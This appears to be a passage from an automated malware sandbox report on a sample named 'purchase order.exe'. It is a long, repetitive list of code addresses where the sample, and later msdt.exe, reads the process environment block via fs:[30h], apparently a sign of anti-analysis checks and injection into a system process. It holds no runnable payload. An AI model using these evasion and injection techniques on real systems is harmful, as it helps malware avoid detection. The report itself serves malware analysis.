            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DFD9B mov eax, dword ptr fs:[00000030h]2_2_017DFD9B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h]2_2_017A2D8A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h]2_2_017A2D8A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h]2_2_017A2D8A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h]2_2_017A2D8A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h]2_2_017A2D8A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h]2_2_017D2581
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h]2_2_017D2581
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h]2_2_017D2581
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h]2_2_017D2581
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C746D mov eax, dword ptr fs:[00000030h]2_2_017C746D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA44B mov eax, dword ptr fs:[00000030h]2_2_017DA44B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878CD6 mov eax, dword ptr fs:[00000030h]2_2_01878CD6
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DBC2C mov eax, dword ptr fs:[00000030h]2_2_017DBC2C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h]2_2_01826CF0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h]2_2_01826CF0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h]2_2_01826CF0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018614FB mov eax, dword ptr fs:[00000030h]2_2_018614FB
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h]2_2_01861C06
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h]2_2_01826C0A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h]2_2_01826C0A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h]2_2_01826C0A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h]2_2_01826C0A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h]2_2_0183C450
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h]2_2_0183C450
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B849B mov eax, dword ptr fs:[00000030h]2_2_017B849B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BFF60 mov eax, dword ptr fs:[00000030h]2_2_017BFF60
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BEF40 mov eax, dword ptr fs:[00000030h]2_2_017BEF40
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DE730 mov eax, dword ptr fs:[00000030h]2_2_017DE730
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h]2_2_017A4F2E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h]2_2_017A4F2E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CF716 mov eax, dword ptr fs:[00000030h]2_2_017CF716
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h]2_2_017DA70E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h]2_2_017DA70E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187070D mov eax, dword ptr fs:[00000030h]2_2_0187070D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187070D mov eax, dword ptr fs:[00000030h]2_2_0187070D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E37F5 mov eax, dword ptr fs:[00000030h]2_2_017E37F5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h]2_2_0183FF10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h]2_2_0183FF10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878F6A mov eax, dword ptr fs:[00000030h]2_2_01878F6A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B8794 mov eax, dword ptr fs:[00000030h]2_2_017B8794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FE87 mov eax, dword ptr fs:[00000030h]2_2_0183FE87
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B766D mov eax, dword ptr fs:[00000030h]2_2_017B766D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018246A7 mov eax, dword ptr fs:[00000030h]2_2_018246A7
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185FEC0 mov eax, dword ptr fs:[00000030h]2_2_0185FEC0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878ED6 mov eax, dword ptr fs:[00000030h]2_2_01878ED6
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AE620 mov eax, dword ptr fs:[00000030h]2_2_017AE620
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h]2_2_017DA61C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h]2_2_017DA61C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D8E00 mov eax, dword ptr fs:[00000030h]2_2_017D8E00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861608 mov eax, dword ptr fs:[00000030h]2_2_01861608
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B76E2 mov eax, dword ptr fs:[00000030h]2_2_017B76E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D16E0 mov ecx, dword ptr fs:[00000030h]2_2_017D16E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D36CC mov eax, dword ptr fs:[00000030h]2_2_017D36CC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E8EC7 mov eax, dword ptr fs:[00000030h]2_2_017E8EC7
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185FE3F mov eax, dword ptr fs:[00000030h]2_2_0185FE3F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h]2_2_0186AE44
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h]2_2_0186AE44
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486849B mov eax, dword ptr fs:[00000030h]5_2_0486849B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04928CD6 mov eax, dword ptr fs:[00000030h]5_2_04928CD6
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049114FB mov eax, dword ptr fs:[00000030h]5_2_049114FB
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h]5_2_048D6CF0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h]5_2_048D6CF0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6CF0 mov eax, dword ptr fs:[00000030h]5_2_048D6CF0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h]5_2_048D6C0A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h]5_2_048D6C0A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h]5_2_048D6C0A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6C0A mov eax, dword ptr fs:[00000030h]5_2_048D6C0A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911C06 mov eax, dword ptr fs:[00000030h]5_2_04911C06
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492740D mov eax, dword ptr fs:[00000030h]5_2_0492740D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492740D mov eax, dword ptr fs:[00000030h]5_2_0492740D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492740D mov eax, dword ptr fs:[00000030h]5_2_0492740D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488BC2C mov eax, dword ptr fs:[00000030h]5_2_0488BC2C
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A44B mov eax, dword ptr fs:[00000030h]5_2_0488A44B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h]5_2_048EC450
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EC450 mov eax, dword ptr fs:[00000030h]5_2_048EC450
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487746D mov eax, dword ptr fs:[00000030h]5_2_0487746D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882581 mov eax, dword ptr fs:[00000030h]5_2_04882581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882581 mov eax, dword ptr fs:[00000030h]5_2_04882581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882581 mov eax, dword ptr fs:[00000030h]5_2_04882581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882581 mov eax, dword ptr fs:[00000030h]5_2_04882581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h]5_2_04852D8A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h]5_2_04852D8A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h]5_2_04852D8A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h]5_2_04852D8A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04852D8A mov eax, dword ptr fs:[00000030h]5_2_04852D8A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h]5_2_0488FD9B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488FD9B mov eax, dword ptr fs:[00000030h]5_2_0488FD9B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048835A1 mov eax, dword ptr fs:[00000030h]5_2_048835A1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h]5_2_04881DB5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h]5_2_04881DB5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04881DB5 mov eax, dword ptr fs:[00000030h]5_2_04881DB5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049205AC mov eax, dword ptr fs:[00000030h]5_2_049205AC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049205AC mov eax, dword ptr fs:[00000030h]5_2_049205AC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov ecx, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D6DC9 mov eax, dword ptr fs:[00000030h]5_2_048D6DC9
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04908DF1 mov eax, dword ptr fs:[00000030h]5_2_04908DF1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h]5_2_0486D5E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486D5E0 mov eax, dword ptr fs:[00000030h]5_2_0486D5E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h]5_2_0491FDE2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h]5_2_0491FDE2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h]5_2_0491FDE2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491FDE2 mov eax, dword ptr fs:[00000030h]5_2_0491FDE2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04928D34 mov eax, dword ptr fs:[00000030h]5_2_04928D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491E539 mov eax, dword ptr fs:[00000030h]5_2_0491E539
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04863D34 mov eax, dword ptr fs:[00000030h]5_2_04863D34
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h]5_2_04884D3B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h]5_2_04884D3B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04884D3B mov eax, dword ptr fs:[00000030h]5_2_04884D3B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485AD30 mov eax, dword ptr fs:[00000030h]5_2_0485AD30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048DA537 mov eax, dword ptr fs:[00000030h]5_2_048DA537
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04893D43 mov eax, dword ptr fs:[00000030h]5_2_04893D43
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D3540 mov eax, dword ptr fs:[00000030h]5_2_048D3540
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04903D40 mov eax, dword ptr fs:[00000030h]5_2_04903D40
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04877D50 mov eax, dword ptr fs:[00000030h]5_2_04877D50
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h]5_2_0487C577
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487C577 mov eax, dword ptr fs:[00000030h]5_2_0487C577
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048EFE87 mov eax, dword ptr fs:[00000030h]5_2_048EFE87
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D46A7 mov eax, dword ptr fs:[00000030h]5_2_048D46A7
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h]5_2_04920EA5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h]5_2_04920EA5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04920EA5 mov eax, dword ptr fs:[00000030h]5_2_04920EA5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04928ED6 mov eax, dword ptr fs:[00000030h]5_2_04928ED6
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048836CC mov eax, dword ptr fs:[00000030h]5_2_048836CC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04898EC7 mov eax, dword ptr fs:[00000030h]5_2_04898EC7
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0490FEC0 mov eax, dword ptr fs:[00000030h]5_2_0490FEC0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048676E2 mov eax, dword ptr fs:[00000030h]5_2_048676E2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048816E0 mov ecx, dword ptr fs:[00000030h]5_2_048816E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h]5_2_0485C600
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h]5_2_0485C600
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485C600 mov eax, dword ptr fs:[00000030h]5_2_0485C600
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04888E00 mov eax, dword ptr fs:[00000030h]5_2_04888E00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h]5_2_0488A61C
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A61C mov eax, dword ptr fs:[00000030h]5_2_0488A61C
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04911608 mov eax, dword ptr fs:[00000030h]5_2_04911608
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485E620 mov eax, dword ptr fs:[00000030h]5_2_0485E620
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0490FE3F mov eax, dword ptr fs:[00000030h]5_2_0490FE3F
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04867E41 mov eax, dword ptr fs:[00000030h]5_2_04867E41
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h]5_2_0491AE44
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AE44 mov eax, dword ptr fs:[00000030h]5_2_0491AE44
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486766D mov eax, dword ptr fs:[00000030h]5_2_0486766D
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h]5_2_0487AE73
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h]5_2_0487AE73
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h]5_2_0487AE73
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h]5_2_0487AE73
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AE73 mov eax, dword ptr fs:[00000030h]5_2_0487AE73
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04868794 mov eax, dword ptr fs:[00000030h]5_2_04868794
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h]5_2_048D7794
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h]5_2_048D7794
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048D7794 mov eax, dword ptr fs:[00000030h]5_2_048D7794
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048937F5 mov eax, dword ptr fs:[00000030h]5_2_048937F5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h]5_2_0488A70E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488A70E mov eax, dword ptr fs:[00000030h]5_2_0488A70E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487F716 mov eax, dword ptr fs:[00000030h]5_2_0487F716
